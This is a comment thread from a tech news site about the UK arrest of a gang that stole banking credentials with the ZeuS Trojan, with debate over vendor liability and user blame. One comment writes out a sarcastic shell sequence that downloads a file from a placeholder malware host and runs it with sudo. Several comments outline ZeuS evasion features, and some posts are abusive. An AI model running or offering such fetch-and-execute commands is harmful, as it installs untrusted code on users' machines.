Gang Arrested For Stealing Millions Using ZeuS

Orome1 writes "Nineteen people were arrested yesterday in the UK and are suspected of being part of an Eastern European gang that used the ZeuS Trojan to steal online banking credentials from unsuspecting victims and siphon around £2 million per month to their accounts."

FREE KEVIN

I'd love to see how long they stay behind bars without a trial. Probably no where near Kevin's term - and without as much fanfare.

Hackers 3: Now the mob does it

Re:FREE KEVIN

[mapkinase]

Usually "mob" refers to organizations with more diversified activities, traditionally including prostitusion, drugs, racketeering.

I do not see any reference in the OA to other criminal activities.

I would not even call it a "gang", which is now reserved to groups united not only by the trade, but also some ideological hocum on top of it.

It's just a small criminal organization, that's it.

Re:FREE KEVIN

[Narcocide]

It's just a small criminal organization, that's it.

I think the word you're looking for is "company."

Re:FREE KEVIN

[mcgrew]

Mob: 1 : a large or disorderly crowd; especially : one bent on riotous or destructive action
2 : the lower classes of a community : masses, rabble
3 chiefly Australian : a flock, drove, or herd of animals
4 : a criminal set : gang; especially often capitalized : mafia 1
5 chiefly British : a group of people : crowd

Gang a (1) : a set of articles : outfit
(2) : a combination of similar implements or devices arranged for convenience to act together
b : group: as
(1) : a group of persons working together
(2) : a group of persons working to unlawful or antisocial ends; especially : a band of antisocial adolescents
2: a group of persons having informal and usually close social relations

Id say that "mob" and "gang" or used correctly, according to the dictionary, regardless of how you "usually" see it.

Re:FREE KEVIN

[mapkinase]

Thank you, I am aware of dictionary definitions. That is why I talked about "usual" definitions.

"regardless of how you "usually" see it."

I guess you are assuming that my perception of what "usual" is has nothing to do with what other people see as "usual".

Re:FREE KEVIN

How is this funny? The word 'company' has almost 12 different definitions, and is a very broad word (see below). If you think it is funny because you are against private companies (in a corporation sense), your ignorance shines bright.
 
company [ kúmpnee ] (plural companies)
noun
Definition:
1. business business: a business enterprise

2. state of being together: the state of being with other people
He didn't feel at ease in company.

3. group: a gathering of people

4. companions: the people that somebody associates with

5. particular type of companion: somebody seen as providing a particular type of companionship
He can be very good company.

6. guest: a guest or visitor, especially for a meal or overnight stay
We're having company this weekend.

7. business business partners: the partners of a business enterprise whose names are not included in the firm's title

8. performing arts troupe: a group of performing artists such as actors

9. military group of troops: a unit of soldiers, usually consisting of two or more platoons

10. navy nautical ship's crew: the crew and officers of a ship

11. firefighters: a unit of firefighters

12. business history trade guild: a medieval trade guild
Stupid commies.

Re:FREE KEVIN

"regardless of how you "usually" see it."

In the quote above the word "usually" is the only word *not* in quotes.
The correct usage is:
"regardless of how you 'usually' see it."

Re:FREE KEVIN

[fiannaFailMan]

How is this funny? The word 'company' has almost 12 different definitions, and is a very broad word (see below). If you think it is funny because you are against private companies (in a corporation sense), your ignorance shines bright.

company [ kúmpnee ] (plural companies)
noun
Definition:
1. business business: a business enterprise

2. state of being together: the state of being with other people
He didn't feel at ease in company.

3. group: a gathering of people

4. companions: the people that somebody associates with

5. particular type of companion: somebody seen as providing a particular type of companionship
He can be very good company.

6. guest: a guest or visitor, especially for a meal or overnight stay
We're having company this weekend.

7. business business partners: the partners of a business enterprise whose names are not included in the firm's title

8. performing arts troupe: a group of performing artists such as actors

9. military group of troops: a unit of soldiers, usually consisting of two or more platoons

10. navy nautical ship's crew: the crew and officers of a ship

11. firefighters: a unit of firefighters

12. business history trade guild: a medieval trade guild
Stupid commies.

I think this is what you're looking for.

Re:FREE KEVIN

[fiannaFailMan]

This is /.. You should be prepared to have nit-picking pedants picking apart the slightest potential alternative interpretation of your post even though the context makes it perfectly clear to anyone with half a brain.

Re:FREE KEVIN

Good. I hope these fucks get raped in prison.

Re:FREE KEVIN

[Tator+Tot]

I think the word you're looking for is "company."

Small companies these days need all the help they can get.

Re:FREE KEVIN

[Abdul+Jakul]

well they always have something to say about something... I was thinking they were using guns and get away vehicles with cool rims, wheels and tires

why not

[rossdee]

Religions have been using to steal money from the believers for thousands of years, its about time the ancient Greeks had a go at it...

Re:why not

[mapkinase]

What does this have to do with the subject except that the name of the Trojan refers to a Greek "god"?

Re:why not

Close but no cigar.

      Trojan refers to the citizens of the city of Troy, which is now known as Truva, Turkey. There is not a Greek god "Trojan" nor "Troy".

    They were contemporary to the great Greek empires, but as I recall they were not themselves Greek. Well, we know how wars and domination during the period went, any particular place in the area could be under a variety of empires, and likely change empires frequently.

Re:why not

[Thanshin]

Whoever modded that down has no sense of humor or way too much religious sensibility.

Re:why not

[BillGod]

Glad it was you and not me. I was just getting ready to post almost the same thing. If I had mod points I would mod you up. I thought it very witty.

Re:why not

ZeuS, you dolt

Re:why not

[fiannaFailMan]

Close but no cigar.

      Trojan refers to the citizens of the city of Troy, which is now known as Truva, Turkey. There is not a Greek god "Trojan" nor "Troy".

    They were contemporary to the great Greek empires, but as I recall they were not themselves Greek. Well, we know how wars and domination during the period went, any particular place in the area could be under a variety of empires, and likely change empires frequently.

He was talking about Zeus. "No cigar" indeed!

What is it with /. this morning? Is it just me or is it full of pompous know-it-all assholes who are quick to shoot first and ask questions later at the slightest hint of an error in a post?

Re:why not

Zeus was Greek, not Trojan, ignoramus. He threw lightning b olts. Didn't you even splellcheck your vapid blatherings ?

Shouldn't Software Houses Be Held Accountable?

[master_p]

I wonder how much more money should be stolen until Microsoft is held responsible for the non-security of Windows. I am not saying this for karma, I know that Microsoft Eulas say they are not responsible for anything, but I wonder for how long should that be acceptable, given the ubiquity of Windows.

If you think I am karma whoring, replace 'Microsoft' with anyone writing software running on millions of machines. Shouldn't software houses of that magnitude be held accountable for at least something like this?

Re:Shouldn't Software Houses Be Held Accountable?

[Spad]

Why though? If Joe User is dumb enough to run "JustinBieberNaked.exe" as root/admin/whatever then no amount of OS security will prevent the machine from being compromised. The weakest point of any system is always between the keyboard and the chair.

Now if you're talking clear negligence in not fixing known issues, etc. then perhaps you have a case, but then why drawn the line at big companies, surely everyone should be equally liable even if they're a one-man operation working out of their bedroom?

Re:Shouldn't Software Houses Be Held Accountable?

[boneclinkz]

Shouldn't software houses of that magnitude be held accountable for at least something like this?

Absolutely not.

Re:Shouldn't Software Houses Be Held Accountable?

[Narcocide]

Yes, despite an EULA that disavows them from any responsibility they actively market to the government, the military, and other purveyors of critical infrastructure and flat-out *lie* about its suitability for these purposes. This is criminal activity and should be addressed. At the very least there should be a warning label on the box - something like the government requires on other hazardous consumer goods like alcohol, tobacco, pesticides and household cleaners.

Re:Shouldn't Software Houses Be Held Accountable?

[Errol+backfiring]

Should builders be accountable if your back door can be cracked with a simple crowbar? Breaking in is easier then keeping things or people out. In fact, it is so difficult to keep people out, that security is only added for "too easy" breaches. And then raised as necessary. And off course it must be used wisely. For a lot of vulnerabilities, you still have to invite the vampire in first.

Re:Shouldn't Software Houses Be Held Accountable?

[darpified]

Some accountability for their software, but this isn't the time or place for it. How many of these were cases of the user of the OS doing something stupid? At some point the user of the device needs to be held accountable for not properly patching/updating the device. If the software is something truly important, Space Shuttle O2 system, nuclear power plant, etc... Yes, they should be accountable for defects, but not because Facebook User #2,290,231 clicks on a malicious advertisement and gets malware installed because he didn't patch.

Re:Shouldn't Software Houses Be Held Accountable?

I personally don't think it's Microsoft's responsibility. You should research an OS before buying/using it. Same thing as a cheap car. It's not the makers/sellers fault. You're supposed to know what you're buying, or be prepared to fix it yourself, or pay someone else to do it for you. Regardless, you SHOULD blame the user. They should know who their giving their information to, and how safe it is in their computer. If they do not, they need to be prepared to accept losses.

Re:Shouldn't Software Houses Be Held Accountable?

[markusre]

My heart tells me to bash MS, too.
But in this case..... heres my login message:

"Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law."

So in this case Debian(and i think this is true for most linux distributions) is similar to windows.
Please note that i refer to the notice, that it's not responsible and NOT to the actual amount of security issues.

Re:Shouldn't Software Houses Be Held Accountable?

[Amorymeltzer]

It's an interesting thought, and not one I necessarily disagree with, but the inevitable analogies crop up:

- Should auto makers be accountable when people speed?
- Should gun makers be accountable for deaths caused by their products?
- Should websites be accountable for the content participating users share?

In my mind these are listed from most to least absurd, and the last is even relevant. We've got laws in place protecting websites (the whole boring Craigslist thing notwithstanding) and software isn't so different. The time to say "if you don't want to use a potentially insecure product, don't use it" has passed - we're too into the forest to turn back now - but the mentality still holds. There ARE other options out there, but it usually means less revenue. If you start fining Microsoft/Apache/Solaris as being responsible when losses are incurred, then you de-facto hand over more of your own autonomy to them.

Re:Shouldn't Software Houses Be Held Accountable?

[v1]

security is only added for "too easy" breaches. And then raised as necessary.

And windows of course doesn't NEED more security than say, it has NOW. (zeus botnet just isn't bigtime enough yet, costing consumers a paltry 2mil)

Re:Shouldn't Software Houses Be Held Accountable?

[houghi]

You sound like a person blaming women being raped because she dresses sexy.

Re:Shouldn't Software Houses Be Held Accountable?

[Jackie_Chan_Fan]

Its not that people run JustinBiebernaked.exe... Its that they're downloading photoshop illegally :)

Re:Shouldn't Software Houses Be Held Accountable?

[Jeffrey_Walsh+VA]

Not if Microsoft is doing their honest best to make their software secure, but someone finds a way to break in. However, what if it is discovered that Microsoft intentionally leaves vulnerabilities in their software - and perhaps even surreptitiously leaks the vulnerabilities over time? This would force users into applying updates that close the vulns, but may have ulterior purpose to Microsoft, such as degrading performance incrementally. Eventually this would force an upgrade (sooner that than otherwise necessary). Then there should be accountability.

Re:Shouldn't Software Houses Be Held Accountable?

[Jurily]

You sound like a person blaming women being raped because she dresses sexy.

The people we're talking about are not just dressing sexy, they're walking in a prison, pulling their pants down and yelling "Come and get it, boys!".

Re:Shouldn't Software Houses Be Held Accountable?

I wonder how much more money should be stolen until Microsoft is held responsible for the non-security of Windows. I am not saying this for karma, I know that Microsoft Eulas say they are not responsible for anything, but I wonder for how long should that be acceptable, given the ubiquity of Windows.

I wonder how many more lives should be lost until GM is held responsible for the non-safety of Cadillacs. I am not saying this for karma (see, I'm posting as AC), I know that GM sells you the vehicle outright and as such you own it and can use it however you want, but I wonder how long that should be acceptable, given the ubiquity of automobiles.

If I did that right, I just FTFY.

Re:Shouldn't Software Houses Be Held Accountable?

[couchslug]

That's a user issue.

If I choose to wear a gasoline-soaked jockstrap while toasting marshmallows, I should expect toasted yarbles as well.

Re:Shouldn't Software Houses Be Held Accountable?

[djdevon3]

"The weakest point of any system is always between the keyboard and the chair."
On behalf of computer desks everywhere I take offense to that.

Re:Shouldn't Software Houses Be Held Accountable?

[BrokenHalo]

Microsoft isn't quite so forthcoming in their licence agreements, but instead of just coming out and saying "no warranty", they hedge their terms in such a way as to mean the same thing and to require platoons of lawyers to break. Thing is, not one of any of the *nix OSs (including OS X) is vulnerable to this (or pretty nearly any other) exploit in the first place.

It doesn't work to claim that the unixy OSs don't get hit because they rely on security through obscurity. The simple fact is, they are more secure because they are designed better in the first place, and because where holes are found, the patching process is more transparent.

Re:Shouldn't Software Houses Be Held Accountable?

[BrokenHalo]

TMI

Re:Shouldn't Software Houses Be Held Accountable?

You sound like a person blaming women being raped because she dresses sexy.

In the case of a trojan:

% wget http://malware.example.com/justinbiebernaked.gz
% gunzip justinbiebernaked
% chmod u+x justinbiebernaked
% sudo ./justinbiebernaked

Oh noes, I purposely ran an untrusted executable! It's odd that you liken this to rape of women. The equivalent:

1. Woman goes to sex shop
2. She purchases a dildo
3. Gets home, undresses
4. Uses dildo on herself

Sorry, that is not rape.

Re:Shouldn't Software Houses Be Held Accountable?

[tecnico.hitos]

You sound like a person blaming women being raped because she dresses sexy.

The people we're talking about are not just dressing sexy, they're walking in a prison, pulling their pants down and yelling "Come and get it, boys!".

Actually, grandparent's analogy, compared to yours, seems more adequate.

While such people are endangering themselves by being ignorant, it is in no way their fault. Deciding what is safe or not to run is not exactly intuitive for someone with little knowledge on computers, yet if they don't explore and experiment by themselves, they are not likely to learn anything.

An user that runs "JustinBieberNaked.exe" as root simply knows no better. Ignorance is not a crime. Unauthorized access and theft, however, are crimes. Since such user knows little and yet owns and therefore have the right to use the computer, only the OS (and other software) companies can do something to ensure security. While they should not be liable for damages(unless the problem happens on their end and affects the customers), they should do everything they can to ensure security.

Re:1st

[Inda]

Is Taco still giving out badges for first posts?

Re:It's RUSSIA you stupid fucking morons !!

There is no "eastern europe"

Let me guess . . . you went to high school in Texas?

Primer on how to get caught.

[Freddybear]

Grabbed too much. Set off flags at the banks. Did the deed from a traceable location. And then kept on doing it until the cops showed up.

Re:Primer on how to get caught.

[grking]

Grabbing small amounts doesn't help you evade detection. Many people keep a close eye on their internet banking and notice pretty quickly if there's a transfer to another account which they didn't instigate. And that will have the victim on the phone to bank quicker than Zeus's thunderbolt.

Re:Primer on how to get caught.

[Freddybear]

Maybe so, but the big losses get escalated a lot faster. Two millions per month is going to set off all sorts of alarms.

Re:Primer on how to get caught.

[Mattpw]

Many ZeuS packages have an option to remove the outgoing transactions from the user's browser as part of the MITB package, this includes changing the balance total to before the outgoing transactions were made so the user wont know until a paper statement turns up if one ever does as many banks are ditching paper statements in favor of browser based ones. And since they are now using the same trojan tactics on users mobiles to defeat mobile sms authentication I am sure you will see a Zeus mobile trojan upgrade to divert any calls made to the banks hotline number to an even more "helpful" team who will probably need even more user information "to get to the bottom of this please give us your..." /s

Re:Primer on how to get caught.

Michael: "I must've put a decimal point in the wrong place or something. Shit, I always do that. I always mess up some mundane detail."
Peter: "Oh! Well, this is not a mundane detail, Michael!"
Michael: "Hey, quit getting pissed at me. Alright? This was all your idea, bleephole!"
Peter: "Alright, okay, alright, let's try not to get pissed off at each other. Alright? Let's just calm down, let's try to figure this thing out together."

[later]

DOM: Bill! We need you upstairs right away. Some major glitch in the accounting. A lot of money missing.

Re:Primer on how to get caught.

[KingAlanI]

love the Office Space reference. However, it is a mundane detail, just with non-mundane implications.

Re:It's RUSSIA you stupid fucking morons !!

Yes, my friends. In eastern europe there is no "you" !!

But does it run on Linux??!

[mspohr]

As usual, no mention is made in the summary or the linked news item of the platform that runs this trojan. Most geeks will know but shouldn't the public be informed?

BTW, it's hard to hold Microsoft (or any software publisher) responsible for damages caused by these flaws even when grossly negligent. I think that the people who make the decision to run Windows should be accountable for their poor decision. I think most people know that Windows is full of holes for malware. It's negligent to run Windows and expose yourself to these exploits.

Re:It's RUSSIA you stupid fucking morons !!

Eastern North America, no doubt.

Zuse

[ciderVisor]

I thought this was going to be about some hardcore steampunk cyber-criminals, until I discovered it was spelt the wrong way.

ZeuS is now bypassing mobile SMS authentication

[Mattpw]

More interesting news this week is the gang behind ZeuS, as predicted, have successfully integrated man in the middle attacks against mobile phone two-factor authentication schemes. http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html

Re:It's RUSSIA you stupid fucking morons !!

[fiannaFailMan]

Goddamn you people are idiots !! There is no "eastern europe" !!

Who let Miss Teen South Carolina in here?

Oblig.

[Bobb+Sledd]

Opulence. I has it.

wonder which crew it was...

[hesaigo999ca]

I heard of the 409 crew, or the shadow crew, hope it is not either, as some of them guys were pretty cool hackers, more do sh*t then destroy sh*t, show proof of concept stuff, instead of formatting your drives....

Here IS a way to stall users (admins step inside)

"If Joe User is dumb enough to run "JustinBieberNaked.exe" as root/admin/whatever then no amount of OS security will prevent the machine from being compromised. The weakest point of any system is always between the keyboard and the chair." - by Spad (470073) on Wednesday September 29, @10:37AM (#33734258) Homepage

Don't mean to "burst your bubble" bro, but, this WILL/SHOULD do the job here on this very account (per your quote), and specifically regarding ZEUS:

ZEUS TRACKER:

https://zeustracker.abuse.ch/monitor.php?filter=online

You add the sites that that site tracks into say, your local HOSTS file (preceed each entry with 0.0.0.0 (smallest and most "universal" blocking IP address you can use for ALL OS' that use a BSD derived IP Stack)), on each users' system (via say, logon script merges) & there you go!

(After all: IF a user can't go into "the malware kitchen", & they won't usually be able to once you block access to such sites @ the hosts file level, then? Then, they cannot be burned! Pretty simple... &, it works!)

APK

P.S.=> There's other means also, especially for "layered security", such as at the router level via their blocking ranges possible too, but this is just noting it for end points/workstation nodes AND regular users @ home even (not just on the job @ work)... apk

you have a point...

[KingAlanI]

in your commandline entries.
If Linux gets more popular, porn.wmv.exe is just going to become porn.ogg.rpm or something.

I don't think either of the sex analogies capture the "doing something stupid but don't know how stupid it is" essence.

Re:you have a point...

[KingAlanI]

Then again, sex is known to interfere with rational decision-making, so maybe my last line doesn't entirely apply.

Re:1st

[Gilmoure]

Badges?

Badges?

I don't have no badges.

I don't have to show you no steenking badges!

O RLY?

[The+Wild+Norseman]

From TFA:

The 20-something mastermind behind the gang's operation has also been arrested in yesterday's raids...

Any "20-something" is hardly a mastermind of anything, except maybe WoW, and this proves it. At least the article didn't say the phrase "criminal mastermind." That would have royally cheesed me off and forced me to say even more derogatory things.

Re:ITs a political show

[turtleshadow]

Its a political show.

It was a synchronized raid by e-crimes unit of the Yard + photojournalist

It has the standard political trial the bad guy in the press pictures
a) stackup of officers in body armor and battering ram -- check
b) photos of the "crime scene ala the laptop" -- Check -- nice Orthodox icons BTW
c) photos of the guilty being lead away in irons by the guard -- Check and Check

It makes no mention of where the money went but only that the active criminals are caught. Some things to think about

1) 2 M &#163 divided by 19 conspirators (unlikely if equally) is still four times the average wage in Britain and just over the top salary of an defective for the yard after 10 years.

2) It doesn't mention what means the yard used. I mean the interception, the wire tapping and other means to know when the transaction was to occur-- to put doubt into the criminal mind?
did the yard keylogger the keyloggers?
did the yard just pay off for a tip?
The yard could hide their means with the need for state secrecy unlike US courts --- until recently.
Still want to take your mobile and net book on your holiday to London?

3) I doubt they got Keyser Söze